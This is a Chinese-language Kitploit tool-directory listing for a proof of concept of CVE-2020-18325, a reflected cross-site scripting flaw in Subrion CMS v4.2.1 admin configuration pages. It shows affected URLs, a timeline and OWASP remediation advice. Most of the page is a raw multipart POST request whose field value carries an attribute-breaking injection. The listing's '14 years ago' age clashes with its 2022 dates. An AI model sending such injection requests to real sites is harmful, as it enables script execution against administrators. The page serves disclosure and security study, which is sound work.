Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-18325 — 针对Subrion CMS v4.2.1配置面板中反射型XSS漏洞的概念验证利用,演示通过POST请求进行JavaScript注入。 | Kitploit
工具/GitHubGitHub/hamm0nz/cve-2020-18325
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

针对Subrion CMS v4.2.1配置面板中反射型XSS漏洞的概念验证利用,演示通过POST请求进行JavaScript注入。

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Intelliants Subrion CMS v4.2.1 配置面板中存在多个跨站脚本(XSS)漏洞

描述

Subrion CMS 易于安装且管理简单。可作为独立应用程序使用,或与其他应用程序结合使用,以建立入门级、中型或大型网站。

在 Subrion CMS v4.2.1 的配置面板中发现了多个反射型跨站脚本漏洞,远程攻击者可利用这些漏洞注入任意 JavaScript。

日期:2022-02-27
软件链接: https://subrion.org
漏洞作者:HaMM0nz
CVE:CVE-2020-18325
类别: Web 应用程序
受影响的 URL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

概念验证

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

时间线

发现并报告:2019年6月24日
CVE ID 分配:2021年8月11日
公开:2022年2月27日

解决方案

建议遵循 OWASP 的 XSS 防护指南。(https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

下载工具